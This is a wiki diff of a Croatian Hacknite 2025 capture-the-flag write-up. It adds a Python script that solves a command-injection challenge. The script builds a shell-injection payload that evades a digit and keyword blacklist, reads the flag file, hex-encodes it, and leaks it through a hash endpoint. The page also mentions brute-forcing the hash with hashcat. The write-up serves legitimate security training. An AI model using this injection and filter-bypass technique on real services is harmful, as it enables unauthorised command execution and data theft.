Differences

This shows you the differences between two versions of the page.

--- hacknite2025 [2025/11/20 19:05] – mbunic
+++ hacknite2025 [2025/12/01 11:40] (current) – external edit 127.0.0.1
@@ Line 3829: / Line 3829: @@
 Također se zadatak može riješiti i crackanjem vraćenog SHA256 hasha unutar kojega je i vraćen flag, gdje je jedini nepoznati dio 12 znamenki flaga. Korištenjem alata hashcat, ako hashcat ima zadovoljavajuć hashrate i koristi grafičku karticu, može se pretražiti nepoznati prostor u prihvatljivom vremenu.
-Skripta koja rješava zadatak s pomoću blind upita je u nastavku.
+Skripta koja rješava zadatak korištenjem Pythona i enkodiranjem flaga u hex.
+<file>
+import requests
+import binascii
+# CONFIGURATION
+URL = "http://chal.platforma.hacknite.hr:14017/hash"
+def decode_response(hex_string):
+    try:
+        decoded_bytes = binascii.unhexlify(hex_string)
+        return decoded_bytes.decode('utf-8', errors='ignore')
+    except Exception as e:
+        return f"Decoding Error: {e}"
+def solve():
+    print("[*] Constructing Payload...")
+    # 1. Generate the number 1 (for 'head -n 1')
+    # logic: count 'a' -> 1
+    one_gen = "one=$(printf a|wc -c);"
+    # 2. Generate the number 64 (for final truncation)
+    # logic: 64 'a's count
+    a_64 = 'a' * 64
+    len_gen = f"len=$(printf {a_64}|wc -c);"
+    # 3. Locate Python binary without using '3'
+    # 'ls /usr/local/bin/python?' matches '/usr/local/bin/python3'
+    # We pipe to 'head -n $one' to ensure we get just one line/binary
+    find_py = "py=$(ls /usr/local/bin/python?|head -n $one);"
+    # 4. Python One-Liner
+    # Reads stdin, strips whitespace, encodes to hex.
+    # No digits or blacklisted words used here.
+    py_cmd = "import sys;print(sys.stdin.read().strip().encode().hex())"
+    # 5. Construct the full pipeline
+    # head f* -> Read flag
+    # $py -c ... -> Hex encode it using the found python binary
+    # tr -d '\n' -> Safety cleanup (though .strip() does most work)
+    raw_gen = f"raw=$(head f*|$py -c '{py_cmd}'|tr -d '\\n');"
+    # 6. Padding Logic (same as before)
+    pad_str = 'a' * 64
+    # 7. Combine and Print
+    cmd_logic = (
+        f"{one_gen}"
+        f"{len_gen}"
+        f"{find_py}"
+        f"{raw_gen}"
+        f"pad={pad_str};"
+        f"combined=$raw$pad;"
+        f"printf %s $combined|head -c $len"
+    )
+    payload = f"' ; {cmd_logic} ; #"
+    print(f"[*] Payload: {payload}")
+    json_data = {"user_input": payload}
+    try:
+        res = requests.post(URL, json=json_data, timeout=10)
+        response = res.json()
+        if response.get("success"):
+            returned_hash = response.get("hash", "")
+            print(f"[*] Server returned: {returned_hash}")
+            decoded = decode_response(returned_hash)
+            print("="*50)
+            print(f"[*] DECODED OUTPUT: {decoded}")
+            print("="*50)
+        else:
+            print(f"[-] Server reported failure: {response.get('error')}")
+    except Exception as e:
+        print(f"[!] Connection error: {e}")
+if __name__ == "__main__":
+    solve()
+</file>
+Skripta koja rješava zadatak korištenjem Basha i generiranjem blind upita.
 <file>
@@ Line 3916: / Line 4003: @@
 print(f"Exploit finished. Final Flag: {known_flag}")
 </file>